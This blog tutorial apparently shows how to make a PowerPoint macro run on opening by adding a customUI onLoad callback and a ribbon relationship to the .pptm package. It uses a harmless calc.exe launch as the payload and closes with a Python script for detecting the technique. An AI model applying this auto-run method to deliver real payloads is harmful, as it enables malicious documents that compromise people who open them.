Abusing Macros in Powerpoint Presentations

This blog post covers how to execute a payload when a PowerPoint presentation is opened.

Activating Developer Options

For the first step, we open our PowerPoint presentation, then open the options and add the DEVELOPER tab if it isn’t already there.

Adding The Macro

In the Developer tab, we click the Visual Basic button on the far left, which opens a new window. Next, we go to Insert > Module, where we can add our macros. As an example, we will execute calc.exe:

VBA
Sub OpenCalc()
    Dim calcPath As String
    calcPath = "C:\Windows\System32\calc.exe"
    Shell calcPath, vbNormalFocus
End Sub

Now we save the presentation as a .pptm file, NOT a .pptx, and close it.

Editing The File

Next, we unzip the PowerPoint file and edit the _rels/.rels file, adding this line right before the closing </Relationships>:

xml
<Relationship Type="http://schemas.microsoft.com/office/2006/relationships/ui/extensibility" Target="/customUI/customUI.xml" Id="Rd6e72c29d34a427e" />

Your full code should now look like this:

xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
    <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/>
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/>
    <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
    <Relationship Type="http://schemas.microsoft.com/office/2006/relationships/ui/extensibility" Target="/customUI/customUI.xml" Id="Rd6e72c29d34a427e" />
</Relationships>

Now we create a new directory named customUI on the same level as the _rels directory.

Then we create a file named customUI.xml in this new directory and add the following code to it:

xml
<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui"
    onLoad="OpenCalc" > <!--Replace "OpenCalc" with the name of your own macro IF you used your own macro.-->
</customUI>

We’re Already Finished!

We just zip our files back up and make sure the archive is named with a .pptm extension. Our macro should now run when the presentation is opened (once macros are enabled).
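For triage, the artifacts this procedure leaves in the package can be checked without opening the file in Office. The following is an added example, not part of the original post: it reads _rels/.rels, follows any ui/extensibility relationship to its customUI part, and reports the onLoad callback. The function names and the in-memory sample package are assumptions constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted samples, prefer defusedxml

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
UI_EXT_SUFFIX = "/relationships/ui/extensibility"  # suffix match covers other schema years


def find_autorun_ribbon(package):
    """Return (customUI part, onLoad callback, has VBA project) per ribbon relationship."""
    findings = []
    with zipfile.ZipFile(package) as zf:
        names = set(zf.namelist())
        if "_rels/.rels" not in names:
            return findings
        has_vba = any(n.lower().endswith("vbaproject.bin") for n in names)
        for rel in ET.fromstring(zf.read("_rels/.rels")).iter(REL_TAG):
            if not rel.get("Type", "").endswith(UI_EXT_SUFFIX):
                continue
            target = rel.get("Target", "").lstrip("/")
            on_load = None
            if target in names:  # a dangling relationship is still reported
                on_load = ET.fromstring(zf.read(target)).get("onLoad")
            findings.append((target, on_load, has_vba))
    return findings


def build_sample(with_custom_ui):
    """Constructed in-memory package with the layout described above (no real VBA)."""
    ui_ext = "http://schemas.microsoft.com/office/2006" + UI_EXT_SUFFIX
    rel = ('<Relationship Type="%s" Target="/customUI/customUI.xml" '
           'Id="Rd6e72c29d34a427e" />' % ui_ext) if with_custom_ui else ""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/'
            'relationships">%s</Relationships>' % rel)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("_rels/.rels", rels)
        zf.writestr("ppt/vbaProject.bin", b"placeholder")  # constructed stand-in
        if with_custom_ui:
            zf.writestr("customUI/customUI.xml",
                        '<customUI xmlns="http://schemas.microsoft.com/office/2006/01/'
                        'customui" onLoad="OpenCalc"></customUI>')
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for target, on_load, has_vba in find_autorun_ribbon(build_sample(True)):
        print("customUI part %s: onLoad=%r, VBA project present=%s"
              % (target, on_load, has_vba))
```

A customUI part with an onLoad callback alongside a VBA project is worth a closer look in mail-gateway or endpoint triage, since legitimate ribbon customisations also use this relationship.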

Sources

This guest article was provided by our trainee, and we proudly present it. It was made autonomously, with only minimal help and a few cosmetic updates.